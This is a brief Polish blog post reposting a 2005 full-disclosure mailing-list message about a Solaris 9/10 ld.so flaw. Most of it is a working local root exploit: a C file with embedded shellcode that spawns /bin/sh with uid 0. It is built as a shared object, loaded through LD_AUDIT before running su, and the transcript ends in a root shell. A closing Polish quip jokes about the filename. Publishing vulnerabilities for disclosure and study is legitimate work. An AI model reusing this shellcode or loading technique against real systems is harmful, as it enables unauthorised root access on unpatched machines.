Leningradzkie pierwiosnki
Posted on Tue 28 June 2005 in Pamietniczek • 1 min read
From: Przemyslaw Frasunek
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Date: Tue, 28 Jun 2005 01:11:58 +0200
Subject: Solaris 9/10 ld.so fun
[...]
Example on unpatched Solaris 10 (AMD64):
atari:venglin:~> cat dupa.c
static char sh[] ="
\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d
\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3
\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73
\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3
\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0
\x0b\xe8\xcb\xff\xff\xff";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)
``No żesz! Przecież DUPA zasługuje na dopisanie jako metasyntactic variable do Jargon File'a, no nie?``